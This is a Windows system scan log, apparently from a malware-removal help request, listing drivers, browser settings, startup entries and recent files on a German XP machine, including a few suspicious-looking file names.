DRV - (sfdrv01) StarForce Protection Environment Driver (version 1.x) -- C:\WINDOWS\System32\drivers\sfdrv01.sys (Protection Technology)
DRV - (sfhlp02) StarForce Protection Helper Driver (version 2.x) -- C:\WINDOWS\System32\drivers\sfhlp02.sys (Protection Technology)
DRV - (HDAudBus) -- C:\WINDOWS\system32\drivers\Hdaudbus.sys (Windows (R) Server 2003 DDK provider)
DRV - (sfsync02) StarForce Protection Synchronization Driver (version 2.x) -- C:\WINDOWS\System32\drivers\sfsync02.sys (Protection Technology)
DRV - (AVMUNET) -- C:\WINDOWS\system32\drivers\avmunet.sys (AVM GmbH)
DRV - (HPFECP15) -- C:\WINDOWS\System32\drivers\HPFECP15.SYS ()
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.com/
IE - HKCU\..\URLSearchHook:  - Reg Error: Key error. File not found
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "hxxp://start.icq.com/"
FF - prefs.js..extensions.enabledItems: {af79f858-4b25-4ca4-822b-b5db1be628fc}:0.2.5.6
FF - prefs.js..extensions.enabledItems: {b9db16a4-6edc-47ec-a1f4-b86292ed211d}:3.0.4
FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:1.0.3
FF - prefs.js..extensions.enabledItems: {9fb7d178-155a-4318-9173-1a8eaaea7fe4}:2.1.1
FF - prefs.js..browser.search.selectedEngine: "ICQ Search"
FF - prefs.js..browser.search.defaultenginename: "ICQ Search"
 
FF - HKLM\software\mozilla\Firefox\Extensions\\bkmrksync@nokia.com: G:\Programme\Nokia\Nokia PC Suite 7\bkmrksync\ [2010.06.12 13:59:16 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Firefox\Extensions\\{A27F3FEF-1113-4cfb-A032-8E12D7D8EE70}: C:\Programme\Nokia\Nokia Ovi Suite\Connectors\Bookmarks Connector\FirefoxExtension\ [2010.06.17 09:20:42 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6.12\extensions\\Components: C:\Programme\Mozilla Firefox\components [2010.11.09 12:59:07 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6.12\extensions\\Plugins: C:\Programme\Mozilla Firefox\plugins [2010.12.01 22:08:57 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Thunderbird\Extensions\\{CCB7D94B-CA92-4E3F-B79D-ADE0F07ADC74}: C:\Programme\Nokia\Nokia Ovi Suite\Connectors\Thunderbird Connector\ThunderbirdExtension\ [2010.06.17 09:20:44 | 000,000,000 | ---D | M]
 
[2008.08.13 19:17:27 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Extensions
[2010.11.01 17:59:06 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions
[2008.08.13 19:17:47 | 000,000,000 | ---D | M] (IE Tab [de]) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9}
[2010.11.01 17:59:07 | 000,000,000 | ---D | M] (No name found) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\{800b5000-a755-47e1-992b-48a1c1357f07}
[2008.06.16 19:06:48 | 000,000,000 | ---D | M] (No name found) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\{9fb7d178-155a-4318-9173-1a8eaaea7fe4}
[2008.06.16 19:06:48 | 000,000,000 | ---D | M] (BBCodeXtra [de]) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\{af79f858-4b25-4ca4-822b-b5db1be628fc}
[2008.06.16 19:06:48 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
[2008.06.16 19:06:48 | 000,000,000 | ---D | M] (DownThemAll!) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
[2009.09.12 14:23:25 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\firefox@tvunetworks.com
[2008.06.16 19:06:48 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\extensions\videodowloader@videodownloader.net
[2010.12.02 22:43:31 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\mqvbs34f.KKE\extensions
[2010.06.29 15:01:39 | 000,000,000 | ---D | M] (No name found) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\mqvbs34f.KKE\extensions\{9fb7d178-155a-4318-9173-1a8eaaea7fe4}
[2010.10.22 09:15:00 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\mqvbs34f.KKE\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
[2010.09.25 14:28:40 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\mqvbs34f.KKE\extensions\vshare@toolbar
[2007.11.21 15:33:03 | 000,005,310 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\searchplugins\footiefox.xml
[2010.06.21 16:35:24 | 000,001,042 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\kflejg3a.default\searchplugins\icqplugin.xml
[2010.12.02 22:43:31 | 000,000,000 | ---D | M] -- C:\Programme\Mozilla Firefox\extensions
[2010.12.01 22:08:59 | 000,000,000 | ---D | M] (Java Console) -- C:\Programme\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}
[2010.09.15 04:50:38 | 000,472,808 | ---- | M] (Sun Microsystems, Inc.) -- C:\Programme\Mozilla Firefox\plugins\npdeployJava1.dll
[2010.09.09 16:16:31 | 000,001,392 | ---- | M] () -- C:\Programme\Mozilla Firefox\searchplugins\amazondotcom-de.xml
[2010.09.09 16:16:31 | 000,002,344 | ---- | M] () -- C:\Programme\Mozilla Firefox\searchplugins\eBay-de.xml
[2010.09.09 16:16:31 | 000,006,805 | ---- | M] () -- C:\Programme\Mozilla Firefox\searchplugins\leo_ende_de.xml
[2010.09.09 16:16:32 | 000,001,178 | ---- | M] () -- C:\Programme\Mozilla Firefox\searchplugins\wikipedia-de.xml
[2010.09.09 16:16:32 | 000,001,105 | ---- | M] () -- C:\Programme\Mozilla Firefox\searchplugins\yahoo-de.xml
 
Hosts file not found
O2 - BHO: (Adobe PDF Reader) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (no name) - {399d96ca-6f9a-4fff-95fe-284e45ebb935} - No CLSID value found.
O2 - BHO: (Windows Live Anmelde-Hilfsprogramm) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
O2 - BHO: (FDMIECookiesBHO Class) - {CC59E0F9-7E43-44FA-9FAA-8377850BF205} - C:\Programme\Free Download Manager\iefdm2.dll ()
O4 - HKLM..\Run: [{0228e555-4f9c-4e35-a3ec-b109a192b4c2}] C:\Programme\Gmail Notifier\gnotify.exe (Google Inc.)
O4 - HKLM..\Run: [Adobe ARM] C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [Adobe Reader Speed Launcher] C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [Alcmtr] C:\WINDOWS\Alcmtr.exe (Realtek Semiconductor Corp.)
O4 - HKLM..\Run: [avgnt] C:\Programme\Avira\AntiVir Desktop\avgnt.exe (Avira GmbH)
O4 - HKLM..\Run: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe (Malwarebytes Corporation)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [nwiz]  File not found
O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [WheelMouse] C:\Programme\OCZ Technology\Mouse\Amoumain.exe ()
O4 - HKLM..\Run: [ZoneAlarm Client] C:\Programme\Zone Labs\ZoneAlarm\zlclient.exe (Check Point Software Technologies LTD)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoCDBurning = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 153
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 153
O8 - Extra context menu item: Alles mit FDM herunterladen - C:\Programme\Free Download Manager\dlall.htm ()
O8 - Extra context menu item: Auswahl mit FDM herunterladen - C:\Programme\Free Download Manager\dlselected.htm ()
O8 - Extra context menu item: Datei mit FDM herunterladen - C:\Programme\Free Download Manager\dllink.htm ()
O8 - Extra context menu item: Nach Microsoft E&xel exportieren - C:\Programme\Microsoft Office 2007\Office12\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Videos mit FDM herunterladen - C:\Programme\Free Download Manager\dlfvideo.htm ()
O9 - Extra Button: ICQ7.2 - {72EFBFE4-C74F-4187-AEFD-73EA3BE968D6} - C:\Programme\ICQ7.2\ICQ.exe (ICQ, LLC.)
O9 - Extra 'Tools' menuitem : ICQ7.2 - {72EFBFE4-C74F-4187-AEFD-73EA3BE968D6} - C:\Programme\ICQ7.2\ICQ.exe (ICQ, LLC.)
O9 - Extra Button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\Programme\Microsoft Office 2007\Office12\REFIEBAR.DLL (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\WINDOWS\system32\nwprovau.dll (Microsoft Corporation)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000005 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)
O15 - HKCU\..Trusted Domains: aol.com ([objects] * is out of zone range -  5)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 217.0.43.17 217.0.43.49
O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
O18 - Protocol\Handler\navnet {AD6E5643-7B0C-46AA-95AD-9773FF2A857A} - G:\Wichtige Programme\NavNetApp\ComUtilities.dll (MH)
O18 - Protocol\Filter\text/xml {807563E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O24 - Desktop Components:0 (Die derzeitige Homepage) - About:Home
O24 - Desktop WallPaper: C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Microsoft\Wallpaper1.bmp
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2008.06.10 10:27:13 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *) -  File not found
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
 
========== Files/Folders - Created Within 30 Days ==========
 
[2010.12.02 15:18:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\VDLL.DLL
[2010.12.02 15:18:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\runouce.exe
[2010.12.02 15:18:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\RUNDL132.EXE
[2010.12.02 15:18:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\logo_1.exe
[2010.12.02 15:13:59 | 000,632,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\msvcr80.dll
[2010.12.02 15:13:57 | 000,554,240 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\msvcp80.dll
[2010.12.02 15:13:55 | 000,034,048 | ---- | C] (MicroWorld Technologies Inc.) -- C:\WINDOWS\System32\eEmpty.exe
[2010.12.02 15:13:41 | 000,153,600 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\REGEDIT.COM
[2010.12.02 15:13:41 | 000,153,600 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\R.COM
[2010.12.02 15:13:41 | 000,140,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\TASKMGR.COM
[2010.12.02 15:13:41 | 000,140,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\T.COM
[2010.12.02 15:13:39 | 000,000,000 | ---D | C] -- C:\Programme\Gemeinsame Dateien\MicroWorld
[2010.12.02 15:13:32 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\MicroWorld
[2010.12.02 14:59:15 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Download Manager
[2010.12.01 22:34:39 | 000,000,000 | RH-D | C] -- C:\Dokumente und Einstellungen\***\Recent
[2010.12.01 22:09:32 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Sun
[2010.12.01 22:08:57 | 000,472,808 | ---- | C] (Sun Microsystems, Inc.) -- C:\WINDOWS\System32\deployJava1.dll
[2010.12.01 22:08:57 | 000,153,376 | ---- | C] (Sun Microsystems, Inc.) -- C:\WINDOWS\System32\javaws.exe
[2010.12.01 22:08:57 | 000,145,184 | ---- | C] (Sun Microsystems, Inc.) -- C:\WINDOWS\System32\javaw.exe
[2010.12.01 22:08:57 | 000,145,184 | ---- | C] (Sun Microsystems, Inc.) -- C:\WINDOWS\System32\java.exe
[2010.12.01 20:40:15 | 000,000,000 | ---D | C] -- C:\spoolerlogs
[2010.11.05 12:28:04 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\LocalService\Anwendungsdaten\Macromedia
[2010.11.05 10:57:30 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Avira
[2010.11.03 21:12:04 | 000,000,000 | ---D | C] -- C:\Programme\PokerStars
[6 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[2 C:\WINDOWS\System32\drivers\*.tmp files -> C:\WINDOWS\System32\drivers\*.tmp -> ]
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2010.12.03 15:29:42 | 000,002,819 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Desktop\HiJackThis.lnk
[2010.12.03 14:50:15 | 000,272,291 | ---- | M] () -- C:\WINDOWS\System32\NvApps.xml
[2010.12.03 14:49:57 | 000,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2010.12.03 14:29:00 | 000,000,222 | RHS- | M] () -- C:\boot.ini
[2010.12.03 13:59:32 | 000,001,586 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Desktop\Trillian.lnk
[2010.12.02 23:16:11 | 000,012,577 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\Wunschliste CD.docx
[2010.12.02 23:15:02 | 000,028,147 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Desktop\BERIIIIIICHT!.docx
[2010.12.02 17:55:40 | 000,974,588 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\pinfect.zip
[2010.12.02 15:20:34 | 000,000,054 | ---- | M] () -- C:\WINDOWS\Lic.xxx
[2010.12.02 15:13:58 | 000,632,064 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\msvcr80.dll
[2010.12.02 15:13:56 | 000,554,240 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\msvcp80.dll
[2010.12.02 15:13:54 | 000,034,048 | ---- | M] (MicroWorld Technologies Inc.) -- C:\WINDOWS\System32\eEmpty.exe
[2010.12.02 11:02:39 | 000,467,478 | ---- | M] () -- C:\WINDOWS\System32\perfh007.dat
[2010.12.02 11:02:39 | 000,449,586 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2010.12.02 11:02:39 | 000,074,586 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2010.12.02 11:02:38 | 000,087,914 | ---- | M] () -- C:\WINDOWS\System32\perfc007.dat
[2010.12.01 22:36:39 | 000,095,152 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\cc_20101201_223615.reg
[2010.12.01 11:24:23 | 000,002,422 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2010.11.29 17:42:18 | 000,038,224 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys
[2010.11.29 17:42:06 | 000,020,952 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys
[2010.11.22 11:38:12 | 000,061,960 | ---- | M] (Avira GmbH) -- C:\WINDOWS\System32\drivers\avgntflt.sys
[2010.11.17 15:19:12 | 000,011,336 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\Kündigung.docx
[2010.11.13 11:02:26 | 000,034,816 | ---- | M] () -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2010.11.05 11:02:40 | 000,126,856 | ---- | M] (Avira GmbH) -- C:\WINDOWS\System32\drivers\avipbb.sys
[6 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[2 C:\WINDOWS\System32\drivers\*.tmp files -> C:\WINDOWS\System32\drivers\*.tmp -> ]
[1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2010.12.03 15:29:42 | 000,002,819 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Desktop\HiJackThis.lnk
[2010.12.02 17:55:40 | 000,974,588 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\pinfect.zip
[2010.12.02 15:15:13 | 000,000,054 | ---- | C] () -- C:\WINDOWS\Lic.xxx
[2010.12.01 22:36:20 | 000,095,152 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\cc_20101201_223615.reg
[2010.11.17 15:19:12 | 000,011,336 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Eigene Dateien\Kündigung.docx
[2010.10.27 15:29:22 | 000,532,480 | ---- | C] () -- C:\WINDOWS\System32\CddbPlaylist2Sony.dll
[2010.10.11 09:57:15 | 000,000,701 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\init.dll
[2010.10.11 09:57:04 | 000,000,701 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\sound.dll
[2010.10.11 09:56:18 | 000,094,274 | ---- | C] () -- C:\WINDOWS\System32\HPBHEALR.DLL
[2010.08.03 21:34:42 | 000,000,000 | ---- | C] () -- C:\WINDOWS\NtRegEdit.INI
[2010.04.02 16:17:34 | 000,179,091 | ---- | C] () -- C:\WINDOWS\System32\xlive.dll.cat
[2010.01.28 18:38:27 | 000,016,126 | -HS- | C] () -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\qrly
[2009.12.29 18:26:51 | 000,000,023 | ---- | C] () -- C:\WINDOWS\BlendSettings.ini
[2009.11.19 16:21:43 | 000,000,043 | ---- | C] () -- C:\WINDOWS\gswin32.ini
[2009.11.17 11:08:34 | 000,197,424 | ---- | C] () -- C:\WINDOWS\System32\vpnapi.dll
[2009.11.17 11:07:44 | 000,193,328 | ---- | C] () -- C:\WINDOWS\System32\CSGina.dll
[2009.09.25 13:10:42 | 000,278,984 | ---- | C] () -- C:\WINDOWS\System32\drivers\atksgt.sys
[2009.09.25 13:10:41 | 000,025,416 | ---- | C] () -- C:\WINDOWS\System32\drivers\lirsgt.sys
[2009.08.03 00:21:54 | 000,197,912 | ---- | C] () -- C:\WINDOWS\System32\physxcudart_20.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelTraditionalChinese.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelSwedish.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelSpanish.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelSimplifiedChinese.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelPortugese.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelKorean.dll
[2009.08.03 00:21:54 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelJapanese.dll
[2009.08.03 00:21:52 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelGerman.dll
[2009.08.03 00:21:52 | 000,058,648 | ---- | C] () -- C:\WINDOWS\System32\AgCPanelFrench.dll
[2009.06.26 12:05:56 | 000,116,224 | ---- | C] () -- C:\WINDOWS\System32\redmonnt.dll
[2009.04.13 18:44:14 | 000,000,311 | ---- | C] () -- C:\WINDOWS\tm.ini
[2009.03.12 11:40:54 | 000,021,840 | ---- | C] () -- C:\WINDOWS\System32\SIntfNT.dll
[2009.03.12 11:40:54 | 000,017,212 | ---- | C] () -- C:\WINDOWS\System32\SIntf32.dll
[2009.03.12 11:40:54 | 000,012,067 | ---- | C] () -- C:\WINDOWS\System32\SIntf16.dll
[2009.01.15 18:21:48 | 000,685,816 | ---- | C] () -- C:\WINDOWS\System32\drivers\sptd.sys
[2008.12.22 16:58:41 | 000,002,165 | ---- | C] () -- C:\WINDOWS\DTOOLS.INI
[2008.10.16 19:48:34 | 000,765,952 | ---- | C] () -- C:\WINDOWS\System32\xvidcore.dll
[2008.10.16 19:48:34 | 000,383,238 | ---- | C] () -- C:\WINDOWS\System32\libmp3lame-0.dll
[2008.10.16 07:55:29 | 000,000,002 | ---- | C] () -- C:\WINDOWS\msoffice.ini
[2008.10.06 12:33:59 | 000,000,140 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\fusioncache.dat
[2008.08.20 17:29:06 | 000,069,632 | R--- | C] () -- C:\WINDOWS\System32\xmltok.dll
[2008.08.20 17:29:06 | 000,036,864 | R--- | C] () -- C:\WINDOWS\System32\xmlparse.dll
[2008.08.14 21:30:47 | 000,000,222 | ---- | C] () -- C:\WINDOWS\HPFTBX15.INI
[2008.06.16 19:09:10 | 000,034,816 | ---- | C] () -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2008.06.10 15:36:53 | 000,000,403 | ---- | C] () -- C:\WINDOWS\ODBC.INI
[2008.06.10 11:17:04 | 000,004,161 | ---- | C] () -- C:\WINDOWS\ODBCINST.INI
[2006.12.28 04:59:48 | 000,032,768 | ---- | C] () -- C:\WINDOWS\System32\Amhooker.dll
[1999.04.29 23:00:00 | 000,065,536 | ---- | C] () -- C:\WINDOWS\System32\MSRTEDIT.DLL
[1998.09.03 09:05:28 | 000,003,782 | ---- | C] () -- C:\WINDOWS\System32\HPFlnk15.ini
[1998.09.03 08:45:02 | 000,008,192 | ---- | C] () -- C:\WINDOWS\System32\HPFhrl15.dll
[1998.09.03 08:44:58 | 000,280,576 | ---- | C] () -- C:\WINDOWS\System32\HPFsrl15.dll
[1998.09.03 08:44:54 | 000,683,008 | ---- | C] () -- C:\WINDOWS\System32\HPFmrl15.dll
[1998.09.03 08:44:48 | 001,335,296 | ---- | C] () -- C:\WINDOWS\System32\HPFtrl15.dll
[1998.09.03 08:41:02 | 000,193,536 | ---- | C] () -- C:\WINDOWS\System32\HPFcps15.dll
[1998.09.03 08:40:34 | 000,076,800 | ---- | C] () -- C:\WINDOWS\System32\HPF24r15.dll
[1998.09.03 08:39:20 | 000,044,544 | ---- | C] () -- C:\WINDOWS\System32\HPFtst15.dll
[1998.09.03 08:37:38 | 000,067,584 | ---- | C] () -- C:\WINDOWS\System32\HPFpcl15.dll
[1998.09.03 08:30:20 | 000,404,992 | ---- | C] () -- C:\WINDOWS\System32\HPFui15.dll
[1998.09.03 08:23:42 | 000,266,240 | ---- | C] () -- C:\WINDOWS\System32\HPFwin15.dll
[1998.09.03 08:19:54 | 000,037,376 | ---- | C] () -- C:\WINDOWS\System32\HPFmon15.dll
[1998.09.03 08:19:16 | 000,033,280 | ---- | C] () -- C:\WINDOWS\System32\HPFcbl15.dll
[1998.09.03 08:17:14 | 000,023,552 | ---- | C] () -- C:\WINDOWS\System32\HPFnet15.dll
[1998.09.03 08:17:02 | 000,033,384 | ---- | C] () -- C:\WINDOWS\System32\HPFiop15.dll
[1998.09.03 08:16:50 | 000,069,284 | ---- | C] () -- C:\WINDOWS\System32\HPFpml15.dll
[1998.09.03 08:16:44 | 000,138,428 | ---- | C] () -- C:\WINDOWS\System32\HPFmlc15.dll
